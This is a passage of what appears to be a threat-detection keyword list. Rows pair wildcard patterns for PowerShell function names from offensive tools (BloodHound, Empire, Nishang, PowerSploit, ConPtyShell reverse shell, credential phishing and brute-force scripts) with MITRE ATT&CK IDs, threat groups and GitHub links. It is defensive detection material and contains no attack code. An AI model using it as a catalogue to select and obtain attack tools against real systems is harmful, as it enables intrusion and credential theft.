- T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*InvokeBloodHound*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,0,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*Invoke-BloodHound*,offensive_tool_keyword,bloodhound,Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.,T1552 - T1027 - T1059 - T1087,TA0003 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*invoke-bloodhound*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-BloodHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Invoke-Bof *,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,0,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*Invoke-Bof.ps1*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*Invoke-BruteAvailableLogons*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*Invoke-BruteForce*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-BruteLogonAccount*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*Invoke-BruteLogonList*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*Invoke-BSOD*,offensive_tool_keyword,Invoke-BSOD,A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. 
Also enumeartes Windows crash dump settings.,T1561 - T1059,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/peewpw/Invoke-BSOD,1,0,N/A,N/A,3,265,73,2018-04-03T13:36:45Z,2018-03-30T14:20:10Z -*Invoke-BuildAnonymousSMBServer -*,offensive_tool_keyword,Invoke-BuildAnonymousSMBServer,Use to build an anonymous SMB file server,T1570 - T1027 - T1071.001,TA0010,N/A,N/A,Data Exfiltration,https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer,1,0,N/A,6,3,222,43,2021-08-20T14:52:10Z,2021-07-10T01:23:43Z -*Invoke-BuildAnonymousSMBServer.ps1*,offensive_tool_keyword,Invoke-BuildAnonymousSMBServer,Use to build an anonymous SMB file server,T1570 - T1027 - T1071.001,TA0010,N/A,N/A,Data Exfiltration,https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer,1,1,N/A,6,3,222,43,2021-08-20T14:52:10Z,2021-07-10T01:23:43Z -*Invoke-BypassUAC*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-BypassUAC*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-CallbackIEX*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Carbuncle*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Cats -pwds*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Invoke-Cats.ps1*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory 
credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Invoke-Certify*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Certify*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invokechecklocaladminaccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-CheckLocalAdminAccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-CheckLocalAdminAccess*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-checklocaladminaccess*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-ClipboardMonitor*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ConPtyShell*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*Invoke-ConPtyShell*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-ConPtyShell*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*Invoke-ConPtyShell.ps1*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*Invoke-CreateRemoteThread*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialFilesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-CredentialFilesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-CredentialGuardCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration 
Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-CredentialInjection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-CredentialInjection*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-CredentialInjection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialInjection.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialInjection.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-CredentialsPhish*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-DAFT.*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invoke-daisychain*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - 